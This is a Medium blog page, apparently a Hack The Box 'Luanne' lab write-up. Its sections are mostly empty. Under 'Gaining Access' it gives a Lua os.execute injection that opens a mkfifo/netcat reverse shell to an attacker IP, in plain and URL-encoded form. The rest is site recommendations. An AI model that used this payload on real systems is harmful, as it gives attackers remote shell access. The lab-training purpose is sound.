Hack The Box — Luanne

What we will do ?

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

1. Information Gathering

2. Scanning

3. Gaining Access

London') os.execute('rm /tmp/fa;mkfifo /tmp/fa;cat /tmp/fa|/bin/sh -i 2>&1|nc 10.10 .14.44 443 >/tmp/fa;')--+-Encoded command:
%20Leeds%27)%20os.execute(%27rm%20%2Ftmp%2Ffa%3Bmkfifo%20%2Ftmp%2Ffa%3Bcat%20%2Ftmp%2Ffa%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10%20.14.44%20443%20%3E%2Ftmp%2Ffa%3B%27)--

4. Maintaining Access

Stay in touch

--

--

--

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

GET CYBERSECURITY JOB WITHOUT CYBERSECURITY DEGREE. HERE’S HOW?

Security Guide of Math Wallet

Using AWS inspector to monitor EC2 instances for common vulnerabilities.

Dataverse Integrates LI.FI’s Widget

Decrypt Openssl-Encrypted Data in Java

What’s Yours is Mine

BSC STAKING IS LIVE!

Raze Network Monthly Review — May 2021

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

Hack The Box::Backdoor

HackMyVM — Corrosion3

How do Red Team Exercises help CISO to Validate the Security Controls Effectively?

Forge — HTB